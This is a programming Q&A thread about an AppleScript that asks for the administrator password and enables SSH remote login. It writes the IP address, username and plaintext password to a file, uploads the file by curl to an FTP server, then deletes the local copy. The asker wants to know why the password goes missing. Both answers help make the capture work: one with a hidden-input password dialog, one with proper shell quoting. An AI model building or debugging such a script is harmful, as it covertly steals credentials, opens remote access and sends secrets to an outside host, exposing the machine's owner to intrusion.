# Applescript won't send pword variable

Tags: applescript

I am trying to pass 3 variables to a text file that gets sent to server, however one of my variables (pword) does not get sent.

Below is my code:

```
    set pword to do shell script "echo" with administrator privileges

##Enable remote login
do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist" user name (short user name of (system info)) password pword with administrator privileges

##Get ip
set tIP to do shell script "ifconfig en0|grep 'inet '|cut -d ' ' -f 2"

##Get username
set userName to short user name of (system info)

##Create text file with user data
do shell script "echo " & tIP & userName & pword & ">> /Users/" & userName & "/Documents/tests.txt"

##Create path where user data is stored
set thePath to "/Users/" & userName & "/Documents/tests.txt"

##Send the data to the server
do shell script "curl -T " & thePath & " ftp://username:password@server"

##Delete the text file
do shell script "rm /Users/" & userName & "/Documents/tests.txt"
```

Any idea why only userName and tIP get written to the text file and not pword?

Thanks.

Answer (score 1, accepted):

To get the password you should use:

```
set pword to text returned of (display dialog "Enter Password:" default answer "" with hidden answer)
```

Bash is great, but unless you plan to make this whole thing a bash script (which it looks like you've practically already done) you might as well use some of AppleScript's perks.

Answer (score 1):

When you send stuff to the shell you must quote them to make sure they are sent as a whole... in case they haves spaces or something else where the shell would mistake them as separate instead of whole. So I would try this...

```
do shell script "echo " & quoted form of (tIP & userName & pword) & " >> " & quoted form of ("/Users/" & userName & "/Documents/tests.txt")
```

Note that some of your other code would also benefit from "quoted form of" to ensure future-proofing your code. It's good coding practice to use this whether it is needed or not.